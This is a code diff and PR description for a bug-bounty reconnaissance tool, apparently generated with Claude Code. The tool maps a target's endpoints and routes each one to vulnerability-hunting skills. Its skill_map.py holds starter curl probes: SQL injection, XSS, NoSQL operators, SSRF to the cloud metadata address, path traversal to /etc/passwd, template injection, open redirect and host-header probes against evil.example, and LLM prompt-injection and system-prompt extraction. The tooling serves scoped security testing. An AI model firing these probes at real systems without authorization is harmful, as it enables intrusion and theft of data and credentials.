+                              ("security" not in opn and glob_sec)
+                    if not secured:
+                        noauth += 1
+                    for cls in classes_for_openapi(p, m, opn, secured):
+                        items.append({"url": f"{host}{p}", "param": "", "method": m.upper(),
+                                      "vuln_class": cls, "source": "openapi",
+                                      "note": f"{m.upper()} {p} [{'AUTH' if secured else 'NO-AUTH'}]"})
+            log(f"openapi: {host}{op_path} -> '{title}', {len(paths)} path(s) "
+                f"({noauth} no-auth op(s)) -> {len(items)} categorized unit(s)")
+            items += auth_enforcement_sweep(spec, host, log)   # verify declared-secured ops actually enforce
+            break
+    return items
+
+
+def gather_params(scope, log=print, max_items=80):
+    """Deterministic parameter discovery from TWO independent sources — gau (passive historical)
+    and katana (active live crawl) — merged, scope/noise-filtered into (endpoint,param) pairs,
+    then inertness-pruned so only live/processable params reach the map."""
+    from urllib.parse import urlparse, parse_qs
+    src = {}
+    for u, s in _gau_urls(scope, log).items():
+        src.setdefault(u, s)
+    for u, s in _katana_urls(scope, log).items():
+        src.setdefault(u, s)
+    items, seen = [], set()
+    for u in sorted(src):
+        base = u.split("?", 1)[0]
+        if base.count("://") != 1 or re.search(r'https?:/', urlparse(u).path or ""):
+            continue  # skip malformed entries (double-scheme, etc.)
+        for p in parse_qs(urlparse(u).query):
+            pl = p.lower()
+            if pl in PARAM_NOISE or pl.startswith("utm_"):
+                continue
+            key = (base, pl)
+            if key in seen:
+                continue
+            seen.add(key)
+            items.append({"url": f"{base}?{p}=FUZZ", "param": p, "method": "GET", "source": src[u]})
+    log(f"params: {len(items)} unique (endpoint,param) pair(s) from gau+katana after noise filter")
+    return prune_inert_params(items[:max_items], log)
+
+
+if __name__ == "__main__":
+    import sys
+    sys.path.insert(0, __file__.rsplit("/", 1)[0])
+    from scope import Scope
+    if len(sys.argv) > 1:                      # live test: python3 recon.py https://target/  host
+        seeds = [sys.argv[1]]
+        host = sys.argv[2] if len(sys.argv) > 2 else urlparse(sys.argv[1]).hostname
+        sc = Scope(in_scope=[host, "*." + host], seeds=seeds, name="adhoc")
+        items, oos = spa_recon(sc)
+        print(f"\n{len(items)} in-scope surface item(s):")
+        for it in items:
+            print(f"  [{classify(it):13s}] {it['url']}  {('· ' + it['param']) if it.get('param') else ''}")
+        print(f"\nout-of-scope hosts seen (NOT tested): {', '.join(oos[:15])}")
+    else:                                      # offline regex self-test
+        rel, ab = set(), set()
+        _mine('a "/api/completion" b fetch("/api/v1/users") <a href="https://api.acme.com/x">'
+              ' "/graphql" "https://www.googleapis.com/y"', rel, ab)
+        assert "/api/completion" in rel and "/api/v1/users" in rel and "/graphql" in rel, rel
+        assert "https://api.acme.com/x" in ab, ab
+        assert not any("googleapis" in a for a in ab), "noise not filtered"
+        assert classify({"url": "/api/completion"}) == "llm-ai"
+        assert classify({"url": "/api/account", "param": "id"}) == "idor"
+        assert classify({"url": "/go", "param": "url"}) == "open-redirect"
+        assert classify({"url": "/x", "param": "file"}) == "lfi"
+        print("recon.py self-test: PASS")

--- a/engine/skill_map.py
+++ b/engine/skill_map.py
@@ -1,0 +1,112 @@
+#!/usr/bin/env python3
+"""
+skill_map.py — categorize the discovered attack surface against the hunt-* skill arsenal.
+
+The engine's job is NOT to test everything itself. It maps the surface, then tells the
+operator *which skill applies where* and *the first curl to run* — so the human spends
+their 20% expert effort where the 80% automation points:
+
+    surface (endpoint / parameter)  ->  attack class  ->  which hunt-* skill  ->  first curl
+
+Mappings are grounded in the skills actually installed (~/.claude/skills); anything not
+present is filtered out so we never point at a skill that isn't there.
+Active testing is curl-first; Burp MCP is optional (only where noted — OOB/blind/fuzzing).
+"""
+import os
+
+SKILLS_DIR = os.path.expanduser("~/.claude/skills")
+
+# attack class -> hunt skill(s) in the bundle
+CLASS_SKILL = {
+    "sqli": ["hunt-sqli"], "nosqli": ["hunt-nosqli"], "xss": ["hunt-xss", "hunt-dom"],
+    "ssrf": ["hunt-ssrf"], "idor": ["hunt-idor"], "open-redirect": ["hunt-open-redirect"],
+    "lfi": ["hunt-lfi"], "ssti": ["hunt-ssti"], "rce": ["hunt-rce"], "xxe": ["hunt-xxe"],
+    "auth-bypass": ["hunt-auth-bypass", "hunt-session"], "llm-ai": ["hunt-llm-ai"],
+    "saml": ["hunt-saml"], "oauth": ["hunt-oauth"], "mfa": ["hunt-mfa-bypass"],
+    "graphql": ["hunt-graphql"], "csrf": ["hunt-csrf"], "cors": ["hunt-cors"],
+    "info-leak": ["hunt-source-leak", "hunt-api-misconfig"], "secret": ["hunt-source-leak"],
+    "deserialization": ["hunt-deserialization"], "file-upload": ["hunt-file-upload"],
+    "host-header": ["hunt-host-header"], "http-smuggling": ["hunt-http-smuggling"],
+    "race-condition": ["hunt-race-condition"], "business-logic": ["hunt-business-logic"],
+}
+
+# detected tech -> tech-specific skill(s)
+TECH_SKILL = {
+    "next.js": ["hunt-nextjs"], "node.js": ["hunt-nodejs"], "react": ["hunt-dom"],
+    "wordpress": ["hunt-sqli", "hunt-idor"], "laravel": ["hunt-laravel"], "spring": ["hunt-springboot"],
+    "asp.net": ["hunt-aspnet"], "sharepoint": ["hunt-sharepoint"], "graphql": ["hunt-graphql"],
+    "grpc": ["hunt-grpc"],
+}
+
+# curl-first starter probe per class. {u}=url with FUZZ->1, {ur}=injection prefix (before the value)
+CLASS_PROBE = {
+    "sqli": "curl -s \"{u}\"   # then  ' OR '1'='1'--  and time-based  ' AND SLEEP(5)--  (Burp Intruder for blind)",
+    "nosqli": "curl -s \"{u}\"   # then  [$ne]=1 / {\"$gt\":\"\"}  in the param",
+    "xss": "curl -s \"{ur}z1z<svg/onload=alert(1)>\"   # check the marker comes back UNencoded",
+    "open-redirect": "curl -sI \"{ur}https://evil.example\"   # inspect the Location: response header",
+    "ssrf": "curl -s \"{ur}http://169.254.169.254/latest/meta-data/\"   # Burp Collaborator for blind OOB",
+    "idor": "curl -s \"{u}\"   # swap/increment the id across two identities; diff the bodies",
+    "lfi": "curl -s \"{ur}../../../../etc/passwd\"   # also php://filter/convert.base64-encode/resource=",
+    "ssti": "curl -s \"{ur}{{7*7}}\"   # look for 49 (or ${7*7}); confirm engine before RCE",
+    "rce": "curl -s \"{u}\"   # only with explicit authorization; start with benign id;sleep markers",
+    "xxe": "curl -s -X POST \"{u}\" -d '<?xml ...>'   # OOB via Collaborator if blind",
+    "auth-bypass": "curl -s \"{u}\"   # no token / expired token / role swap / forced browse",
+    "llm-ai": "curl -s -X POST \"{u}\" -H 'Content-Type: application/json' -d '{\"messages\":[{\"role\":\"user\",\"content\":\"...\"}]}'   # prompt-injection / system-prompt extraction",
+    "graphql": "curl -s -X POST \"{u}\" -d '{\"query\":\"{__schema{types{name}}}\"}'   # introspection",
+    "csrf": "curl -s \"{u}\"   # check for SameSite / CSRF token on state-changing POST",
+    "info-leak": "curl -s \"{u}\"   # inspect for secrets / verbose errors / source / stack traces",
+    "secret": "curl -s \"{u}\"   # confirm the exposed secret is present (read-only — do NOT exercise it)",
+    "host-header": "curl -s \"{u}\" -H 'Host: evil.example'   # check for reflection / cache / pw-reset poisoning",
+    "saml": "curl -s \"{u}\"   # inspect SAML/SSO config endpoints; test XSW / signature-stripping / IdP confusion (needs auth)",
+    "oauth": "curl -s \"{u}\"   # check redirect_uri validation, state, PKCE, token leakage",
+}
+
+
+def _present():
+    try:
+        return set(os.listdir(SKILLS_DIR))
+    except Exception:
+        return set()
+
+
+def _filter(names):
+    present = _present()
+    return [s for s in names if not present or s in present]
+
+
+def skills_for(vuln_class, tech=None):
+    """Class-specific skill(s) for a vuln class (tech kept separate — see tech_skills)."""
+    out = _filter(CLASS_SKILL.get(vuln_class, []))
+    return out or _filter(["hunt-misc"])
+
+
+def tech_skills(tech):
+    """Tech-stack skill(s) for the detected service tech (target-wide, not per class)."""
+    out = []
+    for t in (tech or []):
+        for s in _filter(TECH_SKILL.get((t or "").lower(), [])):
+            if s not in out:
+                out.append(s)
+    return out
+
+
+def probe_for(vuln_class, url, param=None):
+    """Curl-first starter probe string for a (class, url)."""
+    tmpl = CLASS_PROBE.get(vuln_class, "curl -s \"{u}\"")
+    u = url.replace("FUZZ", "1")
+    if "FUZZ" in url:
+        ur = url.split("FUZZ", 1)[0]
+    elif param:
+        ur = url + ("&" if "?" in url else "?") + param + "="
+    else:
+        ur = url + ("&" if "?" in url else "?") + "x="
+    return tmpl.replace("{u}", u).replace("{ur}", ur)
+
+
+if __name__ == "__main__":
+    miss = [s for skills in list(CLASS_SKILL.values()) + list(TECH_SKILL.values())
+            for s in skills if _present() and s not in _present()]
+    print(f"skill_map: {len(CLASS_SKILL)} class mappings, {len(TECH_SKILL)} tech mappings")
+    print(f"  skills referenced but NOT installed: {sorted(set(miss)) or 'none'}")
+    for c in ("sqli", "open-redirect", "llm-ai", "idor"):
+        print(f"  {c:14s} -> {skills_for(c, ['Next.js'])}  ::  {probe_for(c, 'https://t/?p=FUZZ', 'p')}")

--- a/engine/state.py
+++ b/engine/state.py
@@ -33,7 +33,7 @@ class Engagement:
         if os.path.isfile(self.state_path):
             return json.load(open(self.state_path))
         return {"name": self.name, "created": _now(), "phase": "init",
-                "surface": [], "tested": [], "candidates": [], "confirmed": []}
+                "targets": [], "surface": [], "tested": [], "candidates": [], "confirmed": []}
 
     def save(self):
         tmp = self.state_path + ".tmp"
@@ -53,10 +53,10 @@ class Engagement:
 
     # ---- surface (discovered, scope-checked endpoints/params) ----
     def add_surface(self, items):
-        seen = {(s["url"], s.get("param", "")) for s in self.state["surface"]}
+        seen = {(s["url"], s.get("param", ""), s.get("vuln_class", "")) for s in self.state["surface"]}
         added = 0
         for it in items:
-            key = (it["url"], it.get("param", ""))
+            key = (it["url"], it.get("param", ""), it.get("vuln_class", ""))
             if key not in seen:
                 self.state["surface"].append(it)
                 seen.add(key)


### PR DESCRIPTION
Reworks the `engine/` subsystem into a **map-first, deterministic-first decision-support tool** — it maps a target's attack surface, categorizes it against the installed `hunt-*` skill arsenal, and shows each stage live so the operator focuses their effort. It does **not** try to test everything itself; active hunting is opt-in.

## What's in it (3 commits)
1. **Deterministic recon + arsenal categorization** (`recon.py`, `osint.py`, `skill_map.py`, `state.py`)
   - JS-bundle endpoint mining + secret scanning
   - dual-source parameter discovery (`gau` historical + `katana` live-crawl) with an **inertness-prune** (drops dead/ignored params before the map)
   - **OpenAPI** parsing + an unauthenticated **auth-enforcement sweep** (the “declared ≠ enforced” check — the #1 API risk)
   - **`.well-known` / platform recon** (Firebase `init.json`, OAuth/OIDC discovery, robots)
   - per-`(endpoint|param, class)` → the installed `hunt-*` skill + a **curl-first** starter probe
2. **Map-first orchestrator** (`engine.py`, `agent.py`)
   - default flow `recon → rank → map` (deterministic, `$0`, no agents) → writes `arsenal.md`; `hunt/validate/report` are **opt-in** (`--hunt`)
   - **read-only by default** rules-of-engagement (in-scope hosts only; `--allow-intrusive` to opt in), deterministic **scope-audit**, validator-calibrated severity
   - **`--expand`** OSINT bridge: enumerate subdomains → probe → recon every live in-scope host (the apex is usually marketing; the real surface is on subdomains)
   - parallel hunt/validate; skills-off agents (eval: ~0 capability gain, ~12–15k tokens saved each)
3. **Docs** — README rewritten to the map-first model

## Notes
- The base `engine/` already exists on `main`; this is the rework on top.
- Validated live on real multi-host targets: from an apex alone, `--expand` auto-discovers subdomains → service/tech → platform configs → OpenAPI APIs (auto-parsed + auth-verified) → a full skill-routed map — all deterministic, no agents.
- Breadth is deterministic and free; LLM agents are reserved for the opt-in judgment step.

🤖 Generated with [Claude Code](https://claude.com/claude-code)